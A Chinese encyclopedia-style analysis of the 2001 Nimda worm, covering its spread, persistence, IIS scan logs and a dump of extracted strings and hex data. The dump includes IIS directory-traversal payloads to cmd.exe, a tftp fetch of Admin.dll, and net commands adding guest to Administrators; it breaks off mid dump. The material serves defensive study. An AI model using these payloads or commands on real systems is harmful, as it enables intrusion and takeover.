“Nimda蠕虫病毒”的意思、由来-中文百科全书

Nimda蠕虫病毒介绍

该病毒会通过email传播，当用户邮件的正文为空，似乎没有附件，实际上邮件中嵌入了病毒的执行代码，当用户用OUTLOOK、OUTLOOK EXPRESS（没有安装微软的补丁包的情况下）收邮件，在预览邮件时，病毒就已经不知不觉中执行了。病毒执行时会将自己复制到临时目录，再运行在临时目录中的副本。病毒还会在windows的system目录中生成load.exe文件，同时修改system.ini中的shell从shell=explorer.exe改为explorer.exe load.exe -dontrunold，使病毒在下次系统启动时仍然被激活。另外，在system目录下，病毒还会生成一个副本：riched20.dll。为了通过邮件将自己传播出去，病毒使用了MAPI函数读取用户的email并从中读取SMTP地址和email地址。

另外，病毒运行时会利用ShellExcute执行系统中的一些命令如：NET.EXE、USER.EXE、SHARE.EXE等命令，将Guest用户添加到Guests、Administrators组（针对NT/2000/XP），并激活Guest用户。还将C盘根目录共享出来。

一、影响系统

Windows95, 98,ME,NT 和2000 所有客户端和服务器系统

二、传播方式

*　通过电子邮件从一个客户端感染另一个客户端

*　通过开放的网络共享从一个客户端感染另一个客户端

*　通过浏览被感染的网站从Web 服务器感染客户端

*　通过主动扫描或利用 “Microsoft IIS 4.0 / 5.0 directory traversal”的缺陷”从客户端感染Web 服务器

*　通过扫描 “Code Red” (IN-2001-09),和 “sadmind/IIS” (CA-2001-11) 留下的后门从客户端感染Web 服务器

三、影响

感染Nimda 病毒的机器会不断向Windows 的地址薄中的所有的邮件发送携带了Nimda病毒的邮件的拷贝。

同样的，客户端机器会扫描有漏洞的IIS 服务器。Nimda 会搜寻以前的IIS蠕虫病毒留下的后门：Code Red II [IN-2001-09] 和 sadmind/IIS worm [CA-2001-11]；它也试图利用IIS Directory Traversal 漏洞 (VU #111677)。

初步分析表明, 该病毒除了改变网页的目录以繁衍自身外没有其它破坏性的行为。但通过大量发送电子邮件和扫描网络可以导致网络的“拒绝服务”（DoS）。

四、分析

被感染的机器会发送一份Nimda病毒代码复本到任何在扫描中发现有漏洞的服务器。一旦在该服务器上运行，蠕虫就会遍历系统里的每一个目录（甚至包括所有通过共享文件可以读取得目录），然后会在磁盘里留下一份自身拷贝，取名为"README.EML"。一旦找到了含有web内容的目录（包含html或asp文件），下面Javascript代码段就会被添加到每一个跟web有关的文件中：

"resizable=no,top=6000,left=6000")

</script>

这段代码使得蠕虫可以进一步繁衍，通过浏览器或浏览网络文件感染到新的客户端。

通过浏览器传播

作为感染过程的一部分，Nimda 更改所有的含有web内容的文件（象 .htm, ,html, .asp 等文件）。这样，任何用户浏览该文件，不管是通过浏览器还是网络，就可能会下载一份该病毒。有些浏览器会自动的执行下载动作，感染正在浏览该网站的机器。

通过文件系统感染

Nimda病毒生成大量的自身的复本，取名为README.EML, 写到该用户有可写权限的目录里。如果在另一台机器的用户通过网络共享选取病毒文件，并且设置了预览功能的话，蠕虫就会威胁到这台新的机器。

系统记录

对任何开放80/tcp端口的web服务器，Nimda蠕虫的扫描会生成下面的日志：

GET /scripts/root.exe?/c+dir

GET /MSADC/root.exe?/c+dir

GET /c/winnt/system32/cmd.exe?/c+dir

GET /d/winnt/system32/cmd.exe?/c+dir

GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir

GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir

GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir

GET /msadc/..%5c../..%5c../..%5c/..\\xc1\\x1c../..\\xc1\\x1c../..\\xc1\\

x1c../winnt/system32/cmd.exe?/c+dir

GET /scripts/..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir

GET /scripts/..\\xc0/../winnt/system32/cmd.exe?/c+dir

GET /scripts/..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir

GET /scripts/..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir

GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir

GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir

GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

注：这个例子的前四行表明在试图连接Red Code II 留下的后门，例子的其余部分在试图利用Directory Traversal 漏洞。

五、解决方案

各单位必须高度重视抵抗本次病毒工作，迅速组织管理人员，密切监视网络运行状态，一旦发现此类蠕虫，迅速采取处理措施。

为了让大家更好的研究和应对这种类型的病毒,特此提供病毒部分反汇编代码:

病毒数据串

" .exe"

" -dontrunold"

" -qusery9bnow"

"% Privileged Time"

"% Processor Time"

"% User Time"

"%ld %ld %ld"

"%ld %ld"

"%ls"

"."

".."

".asp"

".doc"

".eml"

".exe"

".htm"

".nws"

"/_mem_bin/..%255c../..%255c../..%255c.."

"/_vti_bin/..%255c../..%255c../..%255c.."

"/Admin.dll"

"/c"

"/d"

"/MSADC"

"/msadc/..%255c../..%255c../..%255c/..%c1%1c../"

"/root.exe?/c+"

"/scripts"

"/scripts/..%%35%63.."

"/scripts/..%%35c.."

"/scripts/..%25%35%63.."

"/scripts/..%252f.."

"/scripts/..%255c.."

"/scripts/..%c0%2f.."

"/scripts/..%c0%af.."

"/scripts/..%c1%1c.."

"/scripts/..%c1%9c.."

"/winnt/system32/cmd.exe?/c+"

"\\"

"\\*.*"

"\\\\"

"\\\\%s"

"\\load.exe"

"\\mmc.exe"

"\\readme*.exe"

"\\readme.eml"

"\\riched20.dll"

"\\system.ini"

"\\wininit.ini"

"__WSAFDIsSet"

">"

"aabbcc"

"admin.dll"

"Admin.dll"

"bind"

"boot"

"c:"

"C:\\"

"c:\\Admin.dll"

"Cache"

"closesocket"

"connect"

"Context Switches/sec"

"Counter 009"

"Counters"

"CreateRemoteThread"

"d:\\Admin.dll"

"DATA"

"default"

"dir"

"dontrunold"

"e:\\Admin.dll"

"Elapsed Time"

"Exec Read Only"

"Exec Read/Write"

"Exec Write Copy"

"Executable"

"EXPLORER"

"explorer.exe load.exe -dontrunold"

"Flags"

"From: <"

"fsdhqherwqi2001"

"GET %s HTTP/1.0"

"gethostbyname"

"gethostname"

"HeapAlloc"

"HeapCompact"

"HeapCreate"

"HeapDestroy"

"HeapFree"

"HELO "

"Hidden"

"HideFileExt"

"html"

"htonl"

"htons"

"ID Process"

"ID Thread"

"Image Space Exec Read Only"

"Image Space Exec Read/Write"

"Image Space Exec Write Copy"

"Image Space Executable"

"Image Space No Access"

"Image Space Read Only"

"Image Space Read/Write"

"Image Space Write Copy"

"Image"

"index"

"inet_addr"

"inet_ntoa"

"ioctlsocket"

"KERNEL32.DLL"

"Last Counter"

"localgroup Administrators guest "

"localgroup Guests guest /add"

"MAIL FROM: <"

"main"

"MAPI32.DLL"

"MAPIFindNext"

"MAPIFreeBuffer"

"MAPILogoff"

"MAPILogon"

"MAPIReadMail"

"MAPIResolveName"

"MAPISendMail"

"Mapped Space Exec Read Only"

"Mapped Space Exec Read/Write"

"Mapped Space Exec Write Copy"

"Mapped Space Executable"

"Mapped Space No Access"

"Mapped Space Read Only"

"Mapped Space Read/Write"

"Mapped Space Write Copy"

"mep"

"MIME-Version: 1.0"

"MPR.DLL"

"NameServer"

"net"

"No Access"

"ntohl"

"ntohs"

"NUL="

"NULL"

"octet"

"open"

"Page Faults/sec"

"Parm1enc"

"Parm2enc"

"Path"

"Personal"

"Priority Base"

"Priority Current"

"Private Bytes"

"Process Address Space"

"Process"

"QUIT"

"qusery9bnow"

"RCPT TO: <"

"Read Only"

"Read/Write"

"readme"

"recv"

"recvfrom"

"RegisterServiceProcess"

"Remark"

"Reserved Space Exec Read Only"

"Reserved Space Exec Read/Write"

"Reserved Space Exec Write Copy"

"Reserved Space Executable"

"Reserved Space No Access"

"Reserved Space Read Only"

"Reserved Space Read/Write"

"Reserved Space Write Copy"

"riched20.dll"

"select"

"send"

"sendto"

"share c$=c:\\"

"Shell"

"SHELL32.DLL"

"ShellExecuteA"

"ShowSuperHidden"

"socket"

"software\\microsoft\\windows nt\\currentversion\\p"

"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App "

"Software\\Microsoft\\Windows\\CurrentVersion\\Expl"

"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\etw"

"Start Address"

"Subject: "

"SYSTEM\\CurrentControlSet\\Services\\lanmanserver"

"SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parame"

"System\\CurrentControlSet\\Services\\VxD\\MSTCP"

"tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20"

"Thread Details"

"Thread"

"Type"

"user guest """

"user guest /active"

"user guest /add"

"User PC"

"Version"

"Virtual Bytes Peak"

"Virtual Bytes"

"VirtualAllocEx"

"VirtualFreeEx"

"VirtualProtectEx"

"VirtualQueryEx"

"winzip32.exe"

"WNetAddConnection2A"

"WNetCancelConnection2A"

"WNetCloseEnum"

"WNetEnumResourceA"

"WNetOpenEnumA"

"Working Set Peak"

"Working Set"

"Write Copy"

"ws2_32.dll"

"WSACleanup"

"WSAStartup"

代码数据

:36179000 00 00 00 00 00 00 00 00 ........

:36179008 00 00 00 00 00 00 00 00 ........

:36179010 2E 00 00 00 53 79 73 74 ....Syst

:36179018 65 6D 5C 43 75 72 72 65 em\\Curre

:36179020 6E 74 43 6F 6E 74 72 6F ntContro

:36179028 6C 53 65 74 5C 53 65 72 lSet\\Ser

:36179030 76 69 63 65 73 5C 56 78 vices\\Vx

:36179038 44 5C 4D 53 54 43 50 00 D\\MSTCP.

:36179040 4E 61 6D 65 53 65 72 76 NameServ

:36179048 65 72 00 00 53 59 53 54 er..SYST

:36179050 45 4D 5C 43 75 72 72 65 EM\\Curre

:36179058 6E 74 43 6F 6E 74 72 6F ntContro

:36179060 6C 53 65 74 5C 53 65 72 lSet\\Ser

:36179068 76 69 63 65 73 5C 54 63 vices\\Tc

:36179070 70 69 70 5C 50 61 72 61 pip\\Para

:36179078 6D 65 74 65 72 73 5C 49 meters\\I

:36179080 6E 74 65 72 66 61 63 65 nterface

:36179088 73 5C 00 00 53 59 53 54 s\\..SYST

:36179090 45 4D 5C 43 75 72 72 65 EM\\Curre

:36179098 6E 74 43 6F 6E 74 72 6F ntContro

:361790A0 6C 53 65 74 5C 53 65 72 lSet\\Ser

:361790A8 76 69 63 65 73 5C 54 63 vices\\Tc

:361790B0 70 69 70 5C 50 61 72 61 pip\\Para

:361790B8 6D 65 74 65 72 73 5C 49 meters\\I

:361790C0 6E 74 65 72 66 61 63 65 nterface

:361790C8 73 00 00 00 43 6F 6E 63 s...Conc

:361790D0 65 70 74 20 56 69 72 75 ept Viru

:361790D8 73 28 43 56 29 20 56 2E s(CV) V.

:361790E0 35 2C 20 43 6F 70 79 72 5, Copyr

:361790E8 69 67 68 74 28 43 29 32 ight(C)2

:361790F0 30 30 31 20 20 52 2E 50 001 R.P

:361790F8 2E 43 68 69 6E 61 00 00 .China..

:36179100 4D 49 4D 45 2D 56 65 72 MIME-Ver

:36179108 73 69 6F 6E 3A 20 31 2E sion: 1.

:36179110 30 0D 0A 43 6F 6E 74 65 0..Conte

:36179118 6E 74 2D 54 79 70 65 3A nt-Type:

:36179120 20 6D 75 6C 74 69 70 61 multipa

:36179128 72 74 2F 72 65 6C 61 74 rt/relat

:36179130 65 64 3B 0D 0A 09 74 79 ed;...ty

:36179138 70 65 3D 22 6D 75 6C 74 pe="mult

:36179140 69 70 61 72 74 2F 61 6C ipart/al

:36179148 74 65 72 6E 61 74 69 76 ternativ

:36179150 65 22 3B 0D 0A 09 62 6F e";...bo

:36179158 75 6E 64 61 72 79 3D 22 undary="

:36179160 3D 3D 3D 3D 5F 41 42 43 ====_ABC

:36179168 31 32 33 34 35 36 37 38 12345678

:36179170 39 30 44 45 46 5F 3D 3D 90DEF_==

:36179178 3D 3D 22 0D 0A 58 2D 50 =="..X-P

:36179180 72 69 6F 72 69 74 79 3A riority:

:36179188 20 33 0D 0A 58 2D 4D 53 3..X-MS

:36179190 4D 61 69 6C 2D 50 72 69 Mail-Pri

:36179198 6F 72 69 74 79 3A 20 4E ority: N

:361791A0 6F 72 6D 61 6C 0D 0A 58 ormal..X

:361791A8 2D 55 6E 73 65 6E 74 3A -Unsent:

:361791B0 20 31 0D 0A 0D 0A 2D 2D 1....--

:361791B8 3D 3D 3D 3D 5F 41 42 43 ====_ABC

:361791C0 31 32 33 34 35 36 37 38 12345678

:361791C8 39 30 44 45 46 5F 3D 3D 90DEF_==

:361791D0 3D 3D 0D 0A 43 6F 6E 74 ==..Cont

:361791D8 65 6E 74 2D 54 79 70 65 ent-Type

:361791E0 3A 20 6D 75 6C 74 69 70 : multip

:361791E8 61 72 74 2F 61 6C 74 65 art/alte

:361791F0 72 6E 61 74 69 76 65 3B rnative;

:361791F8 0D 0A 09 62 6F 75 6E 64 ...bound

:36179200 61 72 79 3D 22 3D 3D 3D ary="===

:36179208 3D 5F 41 42 43 30 39 38 =_ABC098

:36179210 37 36 35 34 33 32 31 44 7654321D

:36179218 45 46 5F 3D 3D 3D 3D 22 EF_===="

:36179220 0D 0A 0D 0A 2D 2D 3D 3D ....--==

:36179228 3D 3D 5F 41 42 43 30 39 ==_ABC09

:36179230 38 37 36 35 34 33 32 31 87654321

:36179238 44 45 46 5F 3D 3D 3D 3D DEF_====

:36179240 0D 0A 43 6F 6E 74 65 6E ..Conten

:36179248 74 2D 54 79 70 65 3A 20 t-Type:

:36179250 74 65 78 74 2F 68 74 6D text/htm

:36179258 6C 3B 0D 0A 09 63 68 61 l;...cha

:36179260 72 73 65 74 3D 22 69 73 rset="is

:36179268 6F 2D 38 38 35 39 2D 31 o-8859-1

:36179270 22 0D 0A 43 6F 6E 74 65 "..Conte

:36179278 6E 74 2D 54 72 61 6E 73 nt-Trans

:36179280 66 65 72 2D 45 6E 63 6F fer-Enco

:36179288 64 69 6E 67 3A 20 71 75 ding: qu

:36179290 6F 74 65 64 2D 70 72 69 oted-pri

:36179298 6E 74 61 62 6C 65 0D 0A ntable..

:361792A0 0D 0A 0D 0A 3C 48 54 4D ....<HTM

:361792A8 4C 3E 3C 48 45 41 44 3E L><HEAD>

:361792B0 3C 2F 48 45 41 44 3E 3C </HEAD><

:361792B8 42 4F 44 59 20 62 67 43 BODY bgC

:361792C0 6F 6C 6F 72 3D 33 44 23 olor=3D#

:361792C8 66 66 66 66 66 66 3E 0D ffffff>.

:361792D0 0A 3C 69 66 72 61 6D 65 .<iframe

:361792D8 20 73 72 63 3D 33 44 63 src=3Dc

:361792E0 69 64 3A 45 41 34 44 4D id:EA4DM

:361792E8 47 42 50 39 70 20 68 65 GBP9p he

:361792F0 69 67 68 74 3D 33 44 30 ight=3D0

:361792F8 20 77 69 64 74 68 3D 33 width=3

:36179300 44 30 3E 0D 0A 3C 2F 69 D0>..</i

:36179308 66 72 61 6D 65 3E 3C 2F frame></

:36179310 42 4F 44 59 3E 3C 2F 48 BODY></H

:36179318 54 4D 4C 3E 0D 0A 2D 2D TML>..--

:36179320 3D 3D 3D 3D 5F 41 42 43 ====_ABC

:36179328 30 39 38 37 36 35 34 33 09876543

:36179330 32 31 44 45 46 5F 3D 3D 21DEF_==

:36179338 3D 3D 2D 2D 0D 0A 0D 0A ==--....

:36179340 2D 2D 3D 3D 3D 3D 5F 41 --====_A

:36179348 42 43 31 32 33 34 35 36 BC123456

:36179350 37 38 39 30 44 45 46 5F 7890DEF_

:36179358 3D 3D 3D 3D 0D 0A 43 6F ====..Co

:36179360 6E 74 65 6E 74 2D 54 79 ntent-Ty

:36179368 70 65 3A 20 61 75 64 69 pe: audi

:36179370 6F 2F 78 2D 77 61 76 3B o/x-wav;

:36179378 0D 0A 09 6E 61 6D 65 3D ...name=

:36179380 22 72 65 61 64 6D 65 2E "readme.

:36179388 65 78 65 22 0D 0A 43 6F exe"..Co

:36179390 6E 74 65 6E 74 2D 54 72 ntent-Tr

:36179398 61 6E 73 66 65 72 2D 45 ansfer-E

:361793A0 6E 63 6F 64 69 6E 67 3A ncoding:

:361793A8 20 62 61 73 65 36 34 0D base64.

:361793B0 0A 43 6F 6E 74 65 6E 74 .Content

:361793B8 2D 49 44 3A 20 3C 45 41 -ID: <EA

:361793C0 34 44 4D 47 42 50 39 70 4DMGBP9p

:361793C8 3E 0D 0A 0D 0A 00 00 00 >.......

:361793D0 0D 0A 0D 0A 2D 2D 3D 3D ....--==

:361793D8 3D 3D 5F 41 42 43 31 32 ==_ABC12

:361793E0 33 34 35 36 37 38 39 30 34567890

:361793E8 44 45 46 5F 3D 3D 3D 3D DEF_====

:361793F0 0D 0A 0D 0A 00 00 00 00 ........

:361793F8 4E 55 4C 3D 00 00 00 00 NUL=....

:36179400 0D 0A 0D 0A 5B 72 65 6E ....[ren

:36179408 61 6D 65 5D 0D 0A 00 00 ame]....

:36179410 5C 77 69 6E 69 6E 69 74 \\wininit

:36179418 2E 69 6E 69 00 00 00 00 .ini....

:36179420 43 3A 5C 00 50 65 72 73 C:\\.Pers

:36179428 6F 6E 61 6C 00 00 00 00 onal....

:36179430 53 6F 66 74 77 61 72 65 Software

:36179438 5C 4D 69 63 72 6F 73 6F \\Microso

:36179440 66 74 5C 57 69 6E 64 6F ft\\Windo

:36179448 77 73 5C 43 75 72 72 65 ws\\Curre

:36179450 6E 74 56 65 72 73 69 6F ntVersio

:36179458 6E 5C 45 78 70 6C 6F 72 n\\Explor

:36179460 65 72 5C 53 68 65 6C 6C er\\Shell

:36179468 20 46 6F 6C 64 65 72 73 Folders

:36179470 00 00 00 00 5C 00 00 00 ....\\...

:36179478 2E 2E 00 00 5C 2A 2E 2A ....\\*.*

:36179480 00 00 00 00 04 00 00 80 ........

:36179488 02 00 00 80 45 58 50 4C ....EXPL

:36179490 4F 52 45 52 00 00 00 00 ORER....

:36179498 66 73 64 68 71 68 65 72 fsdhqher

:361794A0 77 71 69 32 30 30 31 00 wqi2001.

:361794A8 53 59 53 54 45 4D 5C 43 SYSTEM\\C

:361794B0 75 72 72 65 6E 74 43 6F urrentCo

:361794B8 6E 74 72 6F 6C 53 65 74 ntrolSet

:361794C0 5C 53 65 72 76 69 63 65 \\Service

:361794C8 73 5C 6C 61 6E 6D 61 6E s\\lanman

:361794D0 73 65 72 76 65 72 5C 53 server\\S

:361794D8 68 61 72 65 73 5C 53 65 hares\\Se

:361794E0 63 75 72 69 74 79 00 00 curity..

:361794E8 73 68 61 72 65 20 63 24 share c$

:361794F0 3D 63 3A 5C 00 00 00 00 =c:\\....

:361794F8 75 73 65 72 20 67 75 65 user gue

:36179500 73 74 20 22 22 00 00 00 st ""...

:36179508 6C 6F 63 61 6C 67 72 6F localgro

:36179510 75 70 20 41 64 6D 69 6E up Admin

:36179518 69 73 74 72 61 74 6F 72 istrator

:36179520 73 20 67 75 65 73 74 20 s guest

:36179528 2F 61 64 64 00 00 00 00 /add....

:36179530 6C 6F 63 61 6C 67 72 6F localgro

:36179538 75 70 20 47 75 65 73 74 up Guest

:36179540 73 20 67 75 65 73 74 20 s guest

:36179548 2F 61 64 64 00 00 00 00 /add....

:36179550 75 73 65 72 20 67 75 65 user gue

:36179558 73 74 20 2F 61 63 74 69 st /acti

:36179560 76 65 00 00 6F 70 65 6E ve..open

:36179568 00 00 00 00 75 73 65 72 ....user

:36179570 20 67 75 65 73 74 20 2F guest /

:36179578 61 64 64 00 6E 65 74 00

:36179580 48 69 64 65 46 69 6C 65 HideFile

:36179588 45 78 74 00 53 68 6F 77 Ext.Show

:36179590 53 75 70 65 72 48 69 64 SuperHid

:36179598 64 65 6E 00 48 69 64 64 den.Hidd

:361795A0 65 6E 00 00 53 6F 66 74 en..Soft

:361795A8 77 61 72 65 5C 4D 69 63 ware\\Mic

:361795B0 72 6F 73 6F 66 74 5C 57 rosoft\\W

:361795B8 69 6E 64 6F 77 73 5C 43 indows\\C

:361795C0 75 72 72 65 6E 74 56 65 urrentVe

:361795C8 72 73 69 6F 6E 5C 45 78 rsion\\Ex

:361795D0 70 6C 6F 72 65 72 5C 41 plorer\\A

:361795D8 64 76 61 6E 63 65 64 00 dvanced.

:361795E0 25 6C 73 00 5C 5C 25 73 %ls.\\\\%s

:361795E8 00 00 00 00 25 6C 64 20 ....%ld

:361795F0 25 6C 64 20 25 6C 64 00 %ld %ld.

:361795F8 25 6C 64 20 25 6C 64 00 %ld %ld.

:36179600 49 6D 61 67 65 20 53 70 Image Sp

:36179608 61 63 65 20 45 78 65 63 ace Exec

:36179610 20 57 72 69 74 65 20 43 Write C

:36179618 6F 70 79 00 49 6D 61 67 opy.Imag

:36179620 65 20 53 70 61 63 65 20 e Space

:36179628 45 78 65 63 20 52 65 61 Exec Rea

:36179630 64 2F 57 72 69 74 65 00 d/Write.

:36179638 49 6D 61 67 65 20 53 70 Image Sp

:36179640 61 63 65 20 45 78 65 63 ace Exec

:36179648 20 52 65 61 64 20 4F 6E Read On

:36179650 6C 79 00 00 49 6D 61 67 ly..Imag

:36179658 65 20 53 70 61 63 65 20 e Space

:36179660 45 78 65 63 75 74 61 62 Executab

:36179668 6C 65 00 00 49 6D 61 67 le..Imag

:36179670 65 20 53 70 61 63 65 20 e Space

:36179678 57 72 69 74 65 20 43 6F Write Co

:36179680 70 79 00 00 49 6D 61 67 py..Imag

:36179688 65 20 53 70 61 63 65 20 e Space

:36179690 52 65 61 64 2F 57 72 69 Read/Wri

:36179698 74 65 00 00 49 6D 61 67 te..Imag

:361796A0 65 20 53 70 61 63 65 20 e Space

:361796A8 52 65 61 64 20 4F 6E 6C Read Onl

:361796B0 79 00 00 00 49 6D 61 67 y...Imag

:361796B8 65 20 53 70 61 63 65 20 e Space

:361796C0 4E 6F 20 41 63 63 65 73 No Acces

:361796C8 73 00 00 00 4D 61 70 70 s...Mapp

:361796D0 65 64 20 53 70 61 63 65 ed Space

:361796D8 20 45 78 65 63 20 57 72 Exec Wr

:361796E0 69 74 65 20 43 6F 70 79 ite Copy

:361796E8 00 00 00 00 4D 61 70 70 ....Mapp

:361796F0 65 64 20 53 70 61 63 65 ed Space

:361796F8 20 45 78 65 63 20 52 65 Exec Re

:36179700 61 64 2F 57 72 69 74 65 ad/Write

:36179708 00 00 00 00 4D 61 70 70 ....Mapp

:36179710 65 64 20 53 70 61 63 65 ed Space

:36179718 20 45 78 65 63 20 52 65 Exec Re

:36179720 61 64 20 4F 6E 6C 79 00 ad Only.

:36179728 4D 61 70 70 65 64 20 53 Mapped S

:36179730 70 61 63 65 20 45 78 65 pace Exe

:36179738 63 75 74 61 62 6C 65 00 cutable.

:36179740 4D 61 70 70 65 64 20 53 Mapped S

:36179748 70 61 63 65 20 57 72 69 pace Wri

:36179750 74 65 20 43 6F 70 79 00 te Copy.

:36179758 4D 61 70 70 65 64 20 53 Mapped S

:36179760 70 61 63 65 20 52 65 61 pace Rea

:36179768 64 2F 57 72 69 74 65 00 d/Write.

:36179770 4D 61 70 70 65 64 20 53 Mapped S

:36179778 70 61 63 65 20 52 65 61 pace Rea

:36179780 64 20 4F 6E 6C 79 00 00 d Only..

:36179788 4D 61 70 70 65 64 20 53 Mapped S

:36179790 70 61 63 65 20 4E 6F 20 pace No

:36179798 41 63 63 65 73 73 00 00 Access..

:361797A0 52 65 73 65 72 76 65 64 Reserved

:361797A8 20 53 70 61 63 65 20 45 Space E

:361797B0 78 65 63 20 57 72 69 74 xec Writ

:361797B8 65 20 43 6F 70 79 00 00 e Copy..

:361797C0 52 65 73 65 72 76 65 64 Reserved

:361797C8 20 53 70 61 63 65 20 45 Space E

:361797D0 78 65 63 20 52 65 61 64 xec Read

:361797D8 2F 57 72 69 74 65 00 00 /Write..

:361797E0 52 65 73 65 72 76 65 64 Reserved

:361797E8 20 53 70 61 63 65 20 45 Space E

:361797F0 78 65 63 20 52 65 61 64 xec Read

:361797F8 20 4F 6E 6C 79 00 00 00 Only...

:36179800 52 65 73 65 72 76 65 64 Reserved

:36179808 20 53 70 61 63 65 20 45 Space E

:36179810 78 65 63 75 74 61 62 6C xecutabl

:36179818 65 00 00 00 52 65 73 65 e...Rese

:36179820 72 76 65 64 20 53 70 61 rved Spa

:36179828 63 65 20 57 72 69 74 65 ce Write

:36179830 20 43 6F 70 79 00 00 00 Copy...

:36179838 52 65 73 65 72 76 65 64 Reserved

:36179840 20 53 70 61 63 65 20 52 Space R

:36179848 65 61 64 2F 57 72 69 74 ead/Writ

:36179850 65 00 00 00 52 65 73 65 e...Rese

:36179858 72 76 65 64 20 53 70 61 rved Spa

:36179860 63 65 20 52 65 61 64 20 ce Read

:36179868 4F 6E 6C 79 00 00 00 00 Only....

:36179870 52 65 73 65 72 76 65 64 Reserved

:36179878 20 53 70 61 63 65 20 4E Space N

:36179880 6F 20 41 63 63 65 73 73 o Access

:36179888 00 00 00 00 50 72 6F 63 ....Proc

:36179890 65 73 73 20 41 64 64 72 ess Addr

:36179898 65 73 73 20 53 70 61 63 ess Spac

:361798A0 65 00 00 00 45 78 65 63 e...Exec

:361798A8 20 57 72 69 74 65 20 43 Write C

:361798B0 6F 70 79 00 45 78 65 63 opy.Exec

:361798B8 20 52 65 61 64 2F 57 72 Read/Wr

:361798C0 69 74 65 00 45 78 65 63 ite.Exec

:361798C8 20 52 65 61 64 20 4F 6E Read On

:361798D0 6C 79 00 00 45 78 65 63 ly..Exec

:361798D8 75 74 61 62 6C 65 00 00 utable..

:361798E0 57 72 69 74 65 20 43 6F Write Co

:361798E8 70 79 00 00 52 65 61 64 py..Read

:361798F0 2F 57 72 69 74 65 00 00 /Write..

:361798F8 52 65 61 64 20 4F 6E 6C Read Onl

:36179900 79 00 00 00 4E 6F 20 41 y...No A

:36179908 63 63 65 73 73 00 00 00 ccess...

:36179910 49 6D 61 67 65 00 00 00 Image...

:36179918 55 73 65 72 20 50 43 00 User PC.

:36179920 54 68 72 65 61 64 20 44 Thread D

:36179928 65 74 61 69 6C 73 00 00 etails..

:36179930 49 44 20 54 68 72 65 61 ID Threa

:36179938 64 00 00 00 50 72 69 6F d...Prio

:36179940 72 69 74 79 20 43 75 72 rity Cur

:36179948 72 65 6E 74 00 00 00 00 rent....

:36179950 43 6F 6E 74 65 78 74 20 Context

:36179958 53 77 69 74 63 68 65 73 Switches

:36179960 2F 73 65 63 00 00 00 00 /sec....

:36179968 53 74 61 72 74 20 41 64 Start Ad

:36179970 64 72 65 73 73 00 00 00 dress...

:36179978 54 68 72 65 61 64 00 00 Thread..

:36179980 50 61 67 65 20 46 61 75 Page Fau

:36179988 6C 74 73 2F 73 65 63 00 lts/sec.

:36179990 56 69 72 74 75 61 6C 20 Virtual

:36179998 42 79 74 65 73 20 50 65 Bytes Pe

:361799A0 61 6B 00 00 56 69 72 74 ak..Virt

:361799A8 75 61 6C 20 42 79 74 65 ual Byte

:361799B0 73 00 00 00 50 72 69 76 s...Priv

:361799B8 61 74 65 20 42 79 74 65 ate Byte

:361799C0 73 00 00 00 49 44 20 50 s...ID P

:361799C8 72 6F 63 65 73 73 00 00 rocess..

:361799D0 45 6C 61 70 73 65 64 20 Elapsed

:361799D8 54 69 6D 65 00 00 00 00 Time....

:361799E0 50 72 69 6F 72 69 74 79 Priority

:361799E8 20 42 61 73 65 00 00 00 Base...

:361799F0 57 6F 72 6B 69 6E 67 20 Working

:361799F8 53 65 74 20 50 65 61 6B Set Peak

:36179A00 00 00 00 00 57 6F 72 6B ....Work

:36179A08 69 6E 67 20 53 65 74 00 ing Set.

:36179A10 25 20 55 73 65 72 20 54 % User T

:36179A18 69 6D 65 00 25 20 50 72 ime.% Pr

:36179A20 69 76 69 6C 65 67 65 64 ivileged

:36179A28 20 54 69 6D 65 00 00 00 Time...

:36179A30 25 20 50 72 6F 63 65 73 % Proces

:36179A38 73 6F 72 20 54 69 6D 65 sor Time

:36179A40 00 00 00 00 50 72 6F 63 ....Proc

:36179A48 65 73 73 00 43 6F 75 6E ess.Coun

:36179A50 74 65 72 20 30 30 39 00 ter 009.

:36179A58 73 6F 66 74 77 61 72 65 software

:36179A60 5C 6D 69 63 72 6F 73 6F \\microso

:36179A68 66 74 5C 77 69 6E 64 6F ft\\windo

:36179A70 77 73 20 6E 74 5C 63 75 ws nt\\cu

:36179A78 72 72 65 6E 74 76 65 72 rrentver

:36179A80 73 69 6F 6E 5C 70 65 72 sion\\per

:36179A88 66 6C 69 62 5C 30 30 39 flib\\009

:36179A90 00 00 00 00 43 6F 75 6E ....Coun

:36179A98 74 65 72 73 00 00 00 00 ters....

:36179AA0 56 65 72 73 69 6F 6E 00 Version.

:36179AA8 4C 61 73 74 20 43 6F 75 Last Cou

:36179AB0 6E 74 65 72 00 00 00 00 nter....

:36179AB8 73 6F 66 74 77 61 72 65 software

:36179AC0 5C 6D 69 63 72 6F 73 6F \\microso

:36179AC8 66 74 5C 77 69 6E 64 6F ft\\windo

:36179AD0 77 73 20 6E 74 5C 63 75 ws nt\\cu

:36179AD8 72 72 65 6E 74 76 65 72 rrentver

:36179AE0 73 69 6F 6E 5C 70 65 72 sion\\per

:36179AE8 66 6C 69 62 00 00 00 00 flib....

:36179AF0 2F 73 63 72 69 70 74 73 /scripts

:36179AF8 00 00 00 00 2F 4D 53 41 ..../MSA

:36179B00 44 43 00 00 2F 63 00 00 DC../c..

:36179B08 2F 64 00 00 2F 73 63 72 /d../scr

:36179B10 69 70 74 73 2F 2E 2E 25 ipts/..%

:36179B18 32 35 35 63 2E 2E 00 00 255c....

:36179B20 2F 5F 76 74 69 5F 62 69 /_vti_bi

:36179B28 6E 2F 2E 2E 25 32 35 35 n/..%255

:36179B30 63 2E 2E 2F 2E 2E 25 32 c../..%2

:36179B38 35 35 63 2E 2E 2F 2E 2E 55c../..

:36179B40 25 32 35 35 63 2E 2E 00 %255c...

:36179B48 2F 5F 6D 65 6D 5F 62 69 /_mem_bi

:36179B50 6E 2F 2E 2E 25 32 35 35 n/..%255

:36179B58 63 2E 2E 2F 2E 2E 25 32 c../..%2

